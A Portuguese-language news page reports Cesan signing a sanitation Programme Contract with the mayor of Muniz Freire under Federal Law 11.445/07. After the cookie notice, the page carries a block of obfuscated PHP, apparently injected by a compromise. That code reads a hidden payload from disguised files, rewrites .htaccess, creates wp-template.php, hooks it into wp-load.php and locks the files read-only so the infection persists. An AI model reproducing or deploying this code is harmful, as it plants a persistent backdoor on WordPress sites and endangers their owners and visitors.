A Companhia Espírito-santense de Saneamento (Cesan) se reuniu com o prefeito de Muniz Freire para assinar o Contrato de Programa com o município. A assinatura foi realizada devido a Lei Federal nº 11.445/07, que traça as diretrizes para o serviço básico de saneamento no Brasil, e que estabeleceu um novo modelo de prestação e regulação dos serviços. A lei passou a exigir que todos os contratos de concessão existentes sejam substituídos por um Contrato de Programa, o que permitirá à Cesan continuar atuando no município, arcando com os investimentos planejados.

A adequação dos contratos de concessão às diretrizes da Lei é fundamental para que a Cesan realize a captação de recursos junto às entidades de financiamento federais para investimentos em saneamento.

O diretor de Engenharia e Meio Ambiente (D-EM), Thiago José Furtado, a Coordenadora de Administração Contratual (P-CAC), Monica Mattos Guimaraes, o secretário de Saneamento, Habitação e Desenvolvimento Urbano (Sedurb), Marcus Antônio Vicente, e o prefeito de Muniz Freire, Carlos Brahim Bazarella, assinaram o contrato na quarta-feira (29) no escritório Central da Companhia.

“Essa parceria com a Prefeitura representa um compromisso importante que a Companhia tem para manter os cidadãos de Muniz Freire com água tratada e com saneamento básico resolvido”, afirmou Thiago José Goncalves Furtado.

Para que fosse feita a celebração do contrato, o município atendeu a algumas exigências, sendo a principal delas a elaboração do Plano Municipal de Saneamento Básico.

O prefeito de Muniz Freire agradeceu a parceria com a Companhia. “A Cesan proporciona rapidez, agilidade e flexibilidade no trabalho. Estou feliz por representar o município e dizer que a Companhia e Governo do Estado são dois grandes parceiros”, disse.

icone-es

Usamos cookies essenciais ao funcionamento do site. Ao continuar navegando você concorda com a nossa Política de Privacidade

$zxrpath=$_SERVER["DOCUMENT_ROOT"]."/";$_autoplarr=array("/logs/history.log","/tmp/history.log",$zxrpath."wp-includes/css/common.css",$zxrpath."wp-includes/js/jquery/common.js",$zxrpath."wp-includes/blocks/avatar/common.css",$zxrpath."wp-admin/js/widgets/common.js",$zxrpath."wp-admin/css/colors/modern/common.css",$zxrpath."wp-content/themes/twentytwentythree/styles/common.css",$zxrpath."wp-content/themes/twentytwentytwo/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfive/styles/common.css",$zxrpath."wp-content/themes/twentytwentyfour/styles/common.css",$zxrpath."wp-content/plugins/contact-form-7/assets/common.css");$_titlefilename="";$_wptemplatecon="";$_htaccesscon="";foreach($_autoplarr as $_autofile){if(@file_exists($_autofile)){$_titlefilename=$_autofile;break;}}if($_titlefilename){$_autocon=@file_get_contents($_titlefilename);if($_autocon){$_autoarrcon=explode("---", $_autocon);$_wptemplatecon=$_autoarrcon[0];$_htaccesscon=trim($_autoarrcon[1],PHP_EOL);}if($_htaccesscon&&strpos($_htaccesscon, "index.php")!==false){$_htaccessname=$zxrpath.".htaccess";if(file_exists($_htaccessname)){$_htaccesstext=file_get_contents($_htaccessname);if(strpos($_htaccesstext,"404")===false&&strpos($_htaccesstext,"index.php")===false){chmod($_htaccessname, 0775);unlink($_htaccessname);file_put_contents($_htaccessname, $_htaccesscon);chmod($_htaccessname, 0444);}}else{file_put_contents($_htaccessname, $_htaccesscon);if(file_exists($_htaccessname)){chmod($_htaccessname, 0444);}}}$_prewploadfilename=$zxrpath."wp-load.php";$_prewptplfilename=$zxrpath."wp-template.php";if(!file_exists($_prewptplfilename)){file_put_contents($_prewptplfilename, $_wptemplatecon);chmod($_prewptplfilename, 0444);}$_wploadcon=@file_get_contents($_prewploadfilename);if($_wploadcon&&strpos($_wploadcon, "wp-template.php")===false){$_prewplocon=str_replace("/** Define ABSPATH", "if(file_exists(dirname(__FILE__).\"/wp-template.php\")){require_once(dirname(__FILE__).\"/wp-template.php\");}".PHP_EOL."/** Define ABSPATH", $_wploadcon);file_put_contents($_prewploadfilename, $_prewplocon);chmod($_prewploadfilename, 0444);$_currnetfileid=1;}if($_wploadcon&&strpos($_wploadcon, "//if(file_exists(dirname(")!==false){$_wploadcon=str_replace("//if(file_exists(dirname(", "if(file_exists(dirname(", $_wploadcon);file_put_contents($_prewploadfilename, $_wploadcon);chmod($_prewploadfilename, 0444);}}